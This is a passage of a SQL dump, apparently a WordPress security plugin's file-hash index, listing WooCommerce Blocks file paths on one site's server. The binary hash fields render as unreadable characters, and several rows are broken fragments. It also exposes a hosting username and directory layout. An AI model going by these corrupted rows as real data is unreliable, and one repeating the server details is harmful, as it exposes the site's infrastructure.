1-ƐBTUr\r8\Z','',0,'?'),('pT|UL蓛','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dhyΥ5{]G','vgsgê\n!~m#MG5?7P?','',0,'?'),('Ck@yY\\.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/test/use-position-relative-to-viewport.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/test/use-position-relative-to-viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J%jΡReD','$9g*g8=2\'sbI','',0,'?'),('bķnlyz,Ȭ4+99s|߬','',0,'?'),('=dj\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-shallow-equal.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-shallow-equal.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D>̝~n\0[','SJ7۳a4\"}O2jE','',0,'?'),('pv%G7r6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-spoken-message.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-spoken-message.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Au\0Pl','>&5ס̝EJ íɅ9','',0,'?'),('?!~(i/@:o,\\','',0,'?'),('e ~. bąu','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-throw-error.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-throw-error.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԋy8T},','uXz5\0PĵkWE7fU7\"','',0,'?'),('ODw0wJs','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-typography-props.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/hooks/use-typography-props.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','γ-\nT7_ٲ','}oz%G̔vH^)!gM','',0,'?'),('q\"/`i','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/address.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/address.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l@H_3',',5M1IV\0&Ll% ','',0,'?'),(',N;C$c','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/camel-case-keys.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/camel-case-keys.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5iՍ/','I,7$gwY\'I{KROIzS','',0,'?'),('OγiСU_o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/create-notice.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/create-notice.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\'+e','vPFPp҇M\n[0\r','',0,'?'),('s8vvy3JX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/debounce.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/debounce.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FL׵k٭#z','wרZk[U}wjݠ}>e','',0,'?'),('\Z(8T\0y=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/derive-selected-shipping-rates.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/derive-selected-shipping-rates.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','  r!_J\rR0','aI`|y` Fu+5','',0,'?'),('>e5I6E2g84','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/errors.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/errors.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǸIbuT}{H:','k TZ{צQ\\2K','',0,'?'),(',%6˷]\0\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/keyby.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/keyby.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*^ϋ:]vWyhL','\"ic\0 gzd2DC)m4㻎]\'ژ','',0,'?'),('èq^@4Y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/lazy-load-script.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/lazy-load-script.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~`(Б','G6.lkJ7)l','',0,'?'),('IiBf\Z]r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/legacy-events.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/legacy-events.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','żځn&_qx\0)߿7','ަ^5-/(X~9{X#*돀Ѭ','',0,'?'),('c(,\Z#O','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/map-keys.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/map-keys.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/3iU#)ڶy','d z7L\Zih4OV0j ,[B[>','',0,'?'),('>KF#VrԲ37\n\\','',0,'?'),('I+P IK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/test/errors.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/test/errors.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#nl)','.sw=6Pbꁍ*','',0,'?'),('{Ad0խ|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/test/shipping-rates.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/utils/test/shipping-rates.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','պZ{<`S_','50=GZƜU\\NVy1^ 8Z','',0,'?'),(' PB~Lo1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/active-attribute-filters.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/active-attribute-filters.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zm:','5BsjxZ$ìA','',0,'?'),('ɺ7V9ϪD:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rlz>,L','Ga5Y=vSs+(Z+\0{3','',0,'?'),(':}\Z)k8QA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block-wrapper.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block-wrapper.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tov;B:\rPV','8!8iV)J*>iVcb','',0,'?'),('Wy*Zo7ص','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iDK|++}%!!','ί\r-X!{PutWb ','',0,'?'),('BD 49sv','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͘y%B 1ؠN','˰Y Lcm b]&t<9-!R','',0,'?'),('d.es\r=MIB','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/deprecated.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/deprecated.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NVPt|^=T','-L}Z`/cDgᯔoW','',0,'?'),('MY; Ykrc','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^b=-\0','!w\n餀i_=̢4߂ ?','',0,'?'),('c?H[{@k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ch@p\rgpS','niqeϺw{mKr܀','',0,'?'),('ʘ{T0ܳp\0Ƙ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/filter-placeholders.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/filter-placeholders.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jYWm#B-]','U 椮^b[Gb)^Q\'i{F','',0,'?'),('#::Oָ,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/frontend.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/frontend.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YmmQbx [','iH _3R#ѡoO','',0,'?'),('.\"->;D2gM\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';AL4\0]Mu','X 3]|Ӳd 1\'\r6KH6','',0,'?'),(':','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u))S\Z','*CNS91p0P','',0,'?'),('\0}cTPX\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/active-filters/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*_YHa$',')>۶.3Hr06z','',0,'?'),('kbV*55','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ju\rs*C\rZ','z^+hś7*Ѓ:{!^pͶ','',0,'?'),('~rr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block-wrapper.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block-wrapper.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tov;B:\rPV','8!8iV)J*>iVcb','',0,'?'),('K᭵$?;mN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nR϶ˍ\r\\','[f*r(ur_H7cj$D Mk','',0,'?'),('y|\0Mr{?','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u=,0@ ','ehIiRTPA2/ȤR:','',0,'?'),('c0[e_̞','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/checkbox-filter.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/checkbox-filter.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9mYz_5','dH&2 ~,;\"vEjGX','',0,'?'),('8z fPϺ^-/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/deprecated.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/deprecated.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߪR=qZ R','D~`]p 4Yb~}HDͥI','',0,'?'),('\0<&W@͵aS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A!~8]MhGDa\0','b`bW`\nx4z21|Qk','',0,'?'),('\num ;l~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OKlY#bO','Q6m\'OPS','uSHWP0ՂtPML','',0,'?'),('vrQ\rߪ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/test/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/test/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' : fo','/J[c/yε6 v/;+W','',0,'?'),('*6Dp}+zP','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/types.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/types.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*3X\"z:)','Nf0.^4g\' ','',0,'?'),('\nqBmX5=v7a|]','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/utils.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/attribute-filter/utils.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RlMś}H','³M=2 R]FI~RnQc WQϭ k\r','',0,'?'),('+Iû]4/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P x]>/Ӱ?qp','O0=!\0f-y}kЁl','',0,'?'),('[51a\"{a7@S7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ƺ\' qJ[','\r\Zj\"%0ш,ݠ\n\'M','',0,'?'),('PQ\ZfG]!+eƱ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/icon.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/icon.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.e(6X','hvr\'þT.76x,RDy','',0,'?'),('1ȭ!gQ\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\w4C\'&',' JIrVnp.CUyv{I ','',0,'?'),('\0X^v?75','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/breadcrumbs/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','مk&}#;',' 2\n :N*<)Q߃1','',0,'?'),('2d?~ôn92','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/attributes.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/attributes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' XH3;','gE(CB3YWͅʬa','',0,'?'),('˜lvT\nƕMC','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/block.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP#N$}bU٭O','WZ ^xPvs Vd<D{w','',0,'?'),('/揄s_G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/cart-cross-sells-product-list/cart-cross-sells-product.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/cart-cross-sells-product-list/cart-cross-sells-product.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\"\\ RN嗺','leQ.~@H~ V)Sx3?)T','',0,'?'),('\rԎjUR0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E-P0 dY%','>Za,0xV*rq','',0,'?'),('%\'BvX\'F)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 90wS#',':V4U$a_.\\O\'[,= ','',0,'?'),('FsDbYؑ\nk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d j, W','^(ZSjS\Zs+4,&ȕ~vjБ','',0,'?'),('[P\Z?rK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӎw+F','\\lۜvFRI8\\S`!ރ','',0,'?'),('8h\02Hxi','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('̀+.uQW+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\n7O_Ky$ \'','t\ntcvvsL:{7\\Z\"n|]M','',0,'?'),('(\'oGXdH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+C',' df\n_QnKqPceb)6?','',0,'?'),('C5n&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xU%H!_7?','W[ȈO-o;khčJȨ߄1=? ','',0,'?'),('\rWLJLB1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n t\\[ti\Z[','ڔM0csE3\\x)XCg퓆HƷG;','',0,'?'),('\n\\&:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\Z\'^AR`2','MI&&\"u4}ߺ&u\\\"o9AaY\Z','',0,'?'),('uEZ6\ri','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F\0\"}H%','@)<1Cldcq?BV]','',0,'?'),('ꆵyoul','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~`7','9w+>KŌIb&','',0,'?'),('Wp\"r(Mm','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u8m\\:qHʷ','o2b\'߂u(IN|A38)X9','',0,'?'),('xl뗤#5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m*e6x xG)','䇏,Вn:?ʇÐ=\Zlg ','',0,'?'),('dqvWa3$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('FaaZ ]fB','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V+\ZBc|q\nE};','1>0F=sR?199hG','',0,'?'),('~I&aEb','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>j\rm','@\"E\rM l#1YsŎS̀\Zz','',0,'?'),('К\"0{ԃ|TE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ܚl,-1','k٥h󓍾~;-7c.n','',0,'?'),(';0r3vE,:\0 -','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zO$OjD?',')t6HT)a5It?j#','',0,'?'),('!1\0v<&nw߳','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~5Pv3;f\r','e)P :d릹ӱ5;!kG[K5Ib!','',0,'?'),('A(9a˂!','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=]EWz','b&\Z|)-NedgG!d_v','',0,'?'),('ZdsRP','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('N 